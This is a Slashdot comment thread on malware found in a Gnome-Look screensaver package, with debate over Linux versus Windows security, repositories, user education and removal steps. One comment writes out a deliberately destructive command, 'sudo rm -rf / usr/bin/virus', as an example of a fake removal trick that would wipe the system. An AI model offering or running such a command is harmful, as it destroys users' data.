Malware Found Hidden In Screensaver On Gnome-Look 611
AndGodSed writes "OMG! UBUNTU! Reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instruction on cleansing your system.
Not more safe (Score:3, Insightful)
It's been told to all the linux zealots so many times that Linux itself isn't really more secure against malware than Windows. It's only so because it's marketshare is like 0.5%, if even that, and it makes much more sense to make malware where the (non-geeky) users are.
This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.
The funny thing about this is the same that as with Mac OS X users. All of the zealots yelling that Linux/Mac OSX are secure about malware, which results in normal people thinking they can run whatever downloaded "because my OS is secure!".
And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not? What was the last time you got infected by Windows vulnerability? Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as well exploitable.
The only reason malware problems are smaller on Linux than Windows is because of the almost-non-existing desktop marketshare and that those who use it on desktop are usually more tech savvy.
This just shows that if Linux had 95% marketshare on desktop, and Windows 0.5%, it would be the same thing but just turned around.
Re:Not more safe (Score:5, Insightful)
The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so...
It's not more secure because of it's market share, it's more secure because anyone can fix it.
Re:Not more safe (Score:4, Insightful)
This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.
Well that's why the goal is to get as much of the third party software into the repository as possible.
Re:Not more safe (Score:5, Insightful)
All it shows is that Linux is vulnerable to trojan horses. ALL operating systems are vulnerable to trojan horses. When you show me a Linux or OS X computer that's vulnerable to something like the slammer worm, get back to me.
Re:Not more safe (Score:2, Insightful)
Re:Not more safe (Score:5, Insightful)
But that still requires distros to inspect and validate the patches before they go live to repositories. The big part isn't really fixing the code, it's to test that it surely works and doesn't cause problems for users.
And even so, if the vulnerability is in lets say flash, just anyone or distros can't fix that closed source application.
Re:Not more safe (Score:5, Insightful)
Only the tech savvy programmer types that care enough to fix can fix it.
Re:Not more safe (Score:1, Insightful)
Not really. Linux does a better job in many ways of dealing with serious security holes. While you are correct that if marketshare was reversed there would be a corresponding flip in total malware, I suspect that the amount of malware targeting Linux in our alternate universe would be less than the amount of malware targeting Windows in the real universe. Likely the same order of magnitude, but still different. (I'm ignoring for now the issue of how one would reasonably measure or even define how much malware is out there targeting a given system).
The real lesson here is that at the end of the day it still comes down to who the users are. Users who are paranoid are less likely to get problems. Most people don't have the resources or will to be paranoid.
Removal instructions from the site (Score:3, Insightful)
Re:Not more safe (Score:5, Insightful)
Malware doesn't need to exploit vulnerabilities in the software: it only needs vulnerable users. There is no way to patch that.
Re:Not more safe (Score:5, Insightful)
I've been telling many the same thing, but with one exception; Mac and *nix have started out with a better permissions system and therefore users who have downloaded an app from the Internet have been trained to be doubly sure about whatever it is that requires sudo power (e.g, the Mac sudo GUI prompt). Microsoft UAC, on the other hand, has had to deal with transitioning software developers to not write in "Program Files" and other public areas and to save data to personal home folders.
While I'll agree with you that Mac/*nix are not any more secure than Windows, the Mac/*nix users have been taught to take a sudo prompt seriously, while in the early stages and growing pains of UAC, Windows users were easily annoyed by UAC prompts and therefore took the UAC prompts less seriously, because UAC prompted were being triggered by transitioning software developers that did not save data in the user's home folder.
In the end, the security of any system relies on the ability for the user to authenticate and verify software downloaded. But making it more difficult, such as requiring an administrator password to be entered for elevated privileges, makes users more cautious of software requiring a sudo prompt. And while that's not inherently any more secure, at least users think twice before entering their password.
Re:Not more safe (Score:5, Insightful)
The Flash player isn't open source. The Compiler is, the player is not. As I said, the idea behind open source being more secure is that you could have potentially thousands of different solutions to prevent this thing in the future. The best one is chosen and patched into the main tree. If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday." Even if a patch comes in that resolves that problem, it could have been the first solution to said problem and might have problems itself that will need to be fixed later.
It's really the potential quantity of solutions to the problem.
I could argue with you that this vulnerability might have been fixed sooner with more market share.
Re:Not more safe (Score:5, Insightful)
Re:Not more safe (Score:3, Insightful)
But there is a way to minimize the impact, correct? Take this vulnerability for example. It might have had an effect on just the one user, but it wasn't going to be able to infect the system folder...
Windows is getting better with this, but a Windows user still has more potential system destructive powers than an equivalent Linux user.
auto-update (Score:4, Insightful)
Okay, this scares me.
1. What happens when a publisher includes auto-updating code, but not specific attack code, like the DDoS software in the mentioned examples? If discovered it will appear to be a security risk, but not specifically malicious...
2. What happens when a software developer produces some completely innocuous software, gets into the repositories - and then months down the road, produces an update with DDoS capability, and has the update pushed into the repositories and automatically distributed?
Re:Removal instructions from the site (Score:5, Insightful)
This makes me wonder how long it will be before some warning about a fake virus/trojan/worm succeeds in convincing a few Linux newbies to run some command to get rid of the fake malware which inevitably causes damage or actually downloads actual malware. Something along the lines of: "if you've been infected with virus.deb just run the following command: sudo rm -rf / usr/bin/virus" The only cure is education.
Re:Not more safe (Score:5, Insightful)
Mod parent up. I know he's AC, but the point he makes is still good: There is no amount of security that can protect your machine from a clueless user.
When you install a theme the normal way, you just drag the archive file - that is to say, no executeable parts, or any way to make the parts executeable - into the theme manager, and presto, it's installed and it asks if you want to apply it. This doesn't require root privilages because it installs to the user's personal themes folder within their home folder. When they do this, there's no way to sneak in a cron job (that's a scheduled task) or any other nasty automatically executing files. Installing from a .deb is usually unneccessary, and as this story proves, exposes your install to risk if you don't pay attention to what you're installing. In my opinion, Ubuntu, being the most newbie-visible Linux distro at the moment, has a responsibility to educate users on things like this. A PDF in their home folder, or a slide show that takes like ten minutes to go through, telling new users how Linux is different to Windows would work wonders, and take up virtually no space on the install disc. There's no excuse for there not being one.
At least it was fixable. (Score:2, Insightful)
Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this. On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware. I am glad to use an OS that doesn't restrict me like that. :)
Re:Not more safe (Score:5, Insightful)
You have a poor understanding of what "malware" is or what Linux/Mac zealots claim.
Malware is piece of code, all OSes run code, therefore all OSes are vulnerable to malware. What Mac and Linux "zealots" claim is that it's not likely to get malware in Linux/Mac just by browsing a site, opening an e-mail, or just by keeping the computer on and connected to the network -- that hasn't changed.
"Repositories won't help with that, because people want 3rd party programs and games."
I am happy with 25,000+ programs available in Debian repository, I never install random package from the Internet. At least the basic packages should be available from the repos so the risk is at least reduced if not eliminated (depending on the behavior of the user)
In my experience people who use the word "zealot" lack arguments.
Re:Not more safe (Score:3, Insightful)
The software ecosystem is "much more confusing" because it's an OS with 95% marketshare and theres millions of 3rd party programs and games for users. And they really want and need those.
Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.
Re:Repositories! (Score:5, Insightful)
Why? Because it's a sane method of delivering software, which is becoming widely used (i.e. Steam, iTunes Store, etc) vs the traditional "Herpes" model used by Windows?
Re:Not more safe (Score:4, Insightful)
You are arguing about ignorance of users, not the security of the OS...
Re:Repositories! (Score:4, Insightful)
Well do you really want the iPhone like only-approved-software app store for your computer? With no way to download software from anywhere else than that said approved app store.
Re:At least it was fixable. (Score:5, Insightful)
Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this.
Before trolls start yelling about how "OMGZ WINDOZE AV SOFTWARE IS COMPLICATED HAHAHA" and things like that, let me tell you something: because Windows is so accessible, AV software like this can be very easily deployed. All you have to do is click a few icons in the Start Menu to remove this. Blah, blah, blah
On Linux and the like, everything is simple if you already know what you want to do. Otherwise, you have to trust unaccountable internet entities to provide you abstruse commands to run and hope they aren't trying to trick you into doing even more damage to your system. It should be obvious why that is a no way to combat malware.
Re:Removal instructions from the site (Score:5, Insightful)
A confusing command line instruction which most people would Ctrl-C and Ctrl-Shift-V into their terminal is actually a pretty good way to get a virus onto a Linux newbie's computer.
Re:Not more safe (Score:5, Insightful)
Sorry, this line of argument is stupid.
You're basically arguing that you can't be more secure than Windows -- Windows' security is as good as things will ever get, and everything else only gets less viruses because it has less marketshare.
But if so, why all the security advancements in the latests Windows versions? Why isn't it still using Win95 era security? Why did MS bother coding support for NX, UAC and so on? Well, because turns out, it's possible to do better. Current Windows versions are vastly more locked down than Win95, because some design choices turned out to be stupid and vulnerable.
Linux doesn't follow some common Windows security pitfalls, like having ActiveX and having the browser execute binaries from the net. It also doesn't have autorun. Just that closes several ways of compromising the system, therefore at least in that respect it's more secure. Of course it's not 100% impenetrable, but evidently there exist features and implementation details which make it easier or harder to compromise the system, so not all OSes are equally [in]secure, it depends on how they're implemented.
Re:Not more safe (Score:4, Insightful)
This particular malware is not because of a security problem with the OS.
Except that if this was a Windows screensaver you can bet it would be blamed on the OS and not on the fact that it was a social engineering attack.
Re:Not more safe (Score:2, Insightful)
1. Something like a screensaver does not need root privileges to install, it can be unpacked to the user directory with just user rights.
2. Even if installed centrally, the applications inside are still run with user privileges.
3. If some application in the package requires setuid rights, it will be detected by the package manager.
Spot the anachronism (Score:2, Insightful)
Re:Not more safe (Score:4, Insightful)
Re:Not more safe (Score:4, Insightful)
If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday."
If you want Linux to grow and reach more people, as opposed to being a geek niche, then you should forget about requiring people to have the skills necessary to patch the source. Emergence of malware means only one thing: Linux is growing in popularity. Now, if we wish for its popularity to prosper then we should use the normal user's perspective a little bit; you know, people who can't patch the source and compile it by themselves.
Re:At least it was fixable. (Score:2, Insightful)
Re:Not more safe (Score:5, Insightful)
I have a Windows machine which has been running just fine for years, but that doesn't mean that it's just as secure. If I do get a virus on that machine, there's a greater chance I will be rebuilding it opposed to my Linux machine.
Re:Not more safe (Score:2, Insightful)
the "secret" vulnerabilities will be fixed on OSS, while they still exist in secret source software.
Huh? In either case, they only get fixed if someone finds them and reports them as bugs. Users are not expected to be OS and Kernel developers/experts. But even then, You have to deal with users who don't patch their systems.
Conficker worm:
Vulnerability patched: - October 23, 2008 ( http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx [microsoft.com] )
Worm seen in wild: - November 2008 and still spreading to this day
I wonder if the press gave MS a pass on this, since it they had already patched it prior to the first report of the worm was logged. If the tables were reversed I'll bet 100% of Slashdot and the other online Linux cheerleaders would claim it wasn't the fault of any distro. You'd see snide posts like ;)
"Unpatched computers get infected. News at 11" , "Idiots who don't patch their system get infected" , etc. No, its not a strawman, its an informed opinion
Re:Not more safe (Score:3, Insightful)
(If I didn't have backups) I would rather you ran rm -r /etc/ than rm -r ~/ on my box.
Re:Not more safe (Score:2, Insightful)
That already happened, dude. Like six years ago. Get with the program here.
Re:Not more safe (Score:4, Insightful)
Did you just seriously suggest that Ubuntu include a ten minute presentation for users to watch? As in, no sarcasm there? Do you honestly expect anyone to actually sit through that? Most people don't have the attention span to sit through the multilingual Welcome video OS X shows on first-boot without trying to skip it, let alone something that talks about security for ten minutes. Remember, if you can't make the user care enough to look in the address bar to see if the 'PayPal' link sent to them in an email is actually legit, you aren't going to make them care enough to sit through ten minutes of tedium after their install is done.
Re:At least it was fixable. (Score:5, Insightful)
Ah but here is the problem.
To you, removing a virus from Linux is easy, because you are obviously an intelligent Linux user.
(Someone posted above the removal instructions)
For you to write out: sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
seems like nothing at all, but what about the average computer user? Do you think they know what sudo is? Hell I don't use Linux and I have no idea what the shit any of that stuff means. So no, that would only work with someone who really knows what they are doing with Linux.
Now on the flip side, you say...
"On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware"
Ah, but this is going off the assumption that we are dealing with an average Windows user, not an expert user (Such as your self with Linux)
An expert Windows user like myself would say "Removing Malware is easy, just go into the registry's run section, remove what looks suspicious, delete temp files, prefetch, and search for the malware running process (Example: virus.exe) in the registry, and delete it"
Ah see that to me is easy, I've done things like that all the time, and it's just cake.
So I guess the point I'm trying to make is that...To you, removing a virus like this from Linux can be really simple...to someone who knows Linux, but the same can be said to a Windows user...who knows about Windows.
"cleansing your system" (Score:3, Insightful)
There's only one way to "cleanse" your system of malware once it's infected:
Any malware that can auto-update itself can potentially install anything at all. It could, for example, set up a file-sharing node which caches illegal data files [slashdot.org] on your system.
Re:At least it was fixable. (Score:3, Insightful)
This kind of problem is not about Linux or Windows but about distro that added malware in some crap application. In order to avoid that:
1) The typical crap software should not be allowed the same privileges as a typical user (why an screensaver should open sockets? remove files?) There are capabilities and several security options that nobody takes seriously
2) The package system should allow only a predefined set of actions in the installation process. Currently it runs as root any package' script; that's the reason I avoid all .deb files as provided by software vendors but obviously the problem is worse if the malware comes from the distribution
Re:The Elegance of Programming (Score:1, Insightful)
I think you missed his point.. he was making a joke that he doesn't have to use sudo because his account is root.
Re:Not more safe (Score:5, Insightful)
Re:Not more safe (Score:4, Insightful)
We are not. The whole point is that there is one actual human user, and thus there is zero difference if the malware can spread to other users or not, since it has already infected 100% of the available users.
Re:Not more safe (Score:3, Insightful)
Re:Not more safe (Score:5, Insightful)
There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.
AVs don't get "distracted" -- either the real payload is detectable by the AV, in which case the distraction won't be successful since both will be found and removed, or else the real payload is undetectable, in which case you don't need the distraction at all, and as a matter of fact it hurts you by making user more security-conscious.
Re:Removal instructions from the site (Score:5, Insightful)
Oh, dude. When I'm forced to use a Windows machine my #2 pet peeve is the paste buffer. You don't realize how much middle clicking you do until you don't have it anymore.
Re:"cleansing your system" (Score:3, Insightful)
You forgot to verify the BIOS checksum.
Although most malware probably doesn't go that far, it seems like if I really wanted to "pwn yur box", I'd at least patch rm to not delete my executable and instead simply fool the user into thinking it was gone. Patch ps to not display the process.... and general other rootkit mischief. I'm not terribly familiar with that kind of thing, but I assume there are people who have made it their life's work to hide executables on Linux, whereas I KNOW there are people who've made it their life's work on Windows.
The only real solution, IMHO, is to drop-kick the computer out the door and use parchment and a quil pen for all your correspondance. Let's see 'em hack the Amish.
Re:Not more safe (Score:4, Insightful)
That's not the lesson I see. To me it says that a user-based security model are insufficient - apps are too free to call/use each other - the threat has moved from "rooting a box" but rather to "rooting a user". OSes (and users) need to start looking at the user as a system administrator of many threads of personal data.
Web browsers have already discovered much of this - different tabs on your web browser are like different apps and just as a sysadmin cannot trust all the users to play nice with each others' data, users can't trust different apps with full access to all other apps.
Re:Not more safe (Score:1, Insightful)
That is not true for a very simple reason:
GNU/Linux is used on over 60% of the worlds server. 90% of the worlds supercomputers run GNU/Linux. Off course, many of those servers have qualified sysadmins, but many doesn't Actually, MOST doesn't. Most are default installs running the Sendmails, Apaches, Asterisks and Sambas of countless organizations. And they don't get broken into everyday. They run flawlessly for years. If you check the logs of any GNU/Linux machine with a public IP, you'll see thousands of attempts every day, ranging from SSH bruteforce attacks, to carefully crafted screens trying to exploit Apache. But they hold up. GNU/Linux HAS an architecture. You might like it or hate it, but it has one very clearly defined architecture, and it works. Windows has NO architecture. Think about the UAC exploits for Windows Over 9000 that have been there since the first beta and never got fixed. Theres no public specifications, no design, just a pile of files mysteriously binded together. That'll never be secure.
GNU/Linux isn't perfect, and no system is absolutely secure, but it's reasonably secure, and, specially, it's well designed and well documented. When you sit into a GNU/Linux machine, you know what to expect from it. You know what it's doing, and you can clearly configure it's behavior.
Re:Not more safe (Score:5, Insightful)
The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so....
It turns out that I have patched a serious vulnerability in Linux. Please download and install my patch as root on your system.
Sincerely,
Someone
Re:Not more safe (Score:5, Insightful)
If you want Linux to grow and reach more people, as opposed to being a geek niche,
I don't.
For me, Linux is the perfect operating system for a programmer. I'd like it to stay that way. If it becomes popular, that's fine; but if it becomes something other than a programmer's operating system, I will switch to BSD or something.
Re:Not more safe (Score:5, Insightful)
You can make a machine smarter, but people keep getting dumber all the time. At some point you just have to say to those people forget it, you're not going to learn, you're not worth trying to explain it to. Here's your Etch-a-Sketch.
Re:Not more safe (Score:3, Insightful)
Similar functionality was available in grsecurity long before. Most distros don't ship the vanilla kernel anyway.
No, it doesn't. Ubuntu will ask things like "Would you like to see the files on this CD, or download photos from it?", but that's not autorun. What I was referring to is running binaries from newly inserted media. AFAIK no Linux distro does that, even after asking.
IMO, antiviruses are a flawed security model and shouldn't be needed in a well secured system. Antiviruses only work against known threats, which means somebody must have got hit by them previously, and the antivirus vendor must have noticed.
It's much better when the system makes a virus' execution unlikely enough that it doesn't manage to spread.
That doesn't add up. If there is such a thing as an OS that's better protected, some of them are better and some are worse protected, therefore one of those is #1, or at the very least there are security tiers, where some are definitely worse than others.
You seem to be intent on assuming I'm arguing there's such a thing as 100% effective security. But I'm not. I'm arguing that there's such a thing as better security. Linux can be more secure than Windows, while still being vulnerable to some things.
Also, IMO, that a virus can be technically written for Linux isn't very relevant. The important thing isn't whether it can be done, it's whether it will spread. If it won't spread it'll never be a credible threat, and will remain an academic exercise.
Linux needs a "Zone Alarm" like program (Score:3, Insightful)
> keep itself updated via downloads
I keep boring people with this point and I'm going to keep doing so until the Linux peeps get it. Linux needs a program that performs the same function as Zone Alarm. In other words no program on a desktop system should be allowed to connect to the internet before the user has okayed it.
One of the first things I do when a non tehcnical friend asks me to help with their Windows PC is to install Zone Alarm simply because it will prompt you before a programm cann connect to the network or internet. I then explain that if they don't know what a program is, or why it's trying to connect to the internet, don't let it. You can always change your mind later and you can always google it, or ask me, to find out what the program is and what it does.
This has stopped numerous malware infestation getting serious (i.e. downloading their real payload) I believe there's very little real malware nowadays that doesn't require 'net access to do it's work (reporting personal information such as credit card details, being a node in a botnet etc.) so having a gatekeeper between programs and the network should be a primary design consideration of all desktop systems.
Without this functionality it's just a matter of time before the first serious auto updating Linux virus problem occurs. It might well be harder to get a root infestation on a Linux box but does this matter ? A userland program can steal information, participate in a botnet etc. quite adequately for most purposes. If it's well written and consumes little in the way of resources a user probably wouldn''t even notice either.
On Windows Zone Alarm acts like a nightclub bouncer for 'net access. Meanwhile on Linux any old program gets full internet access without the user knowing a thing.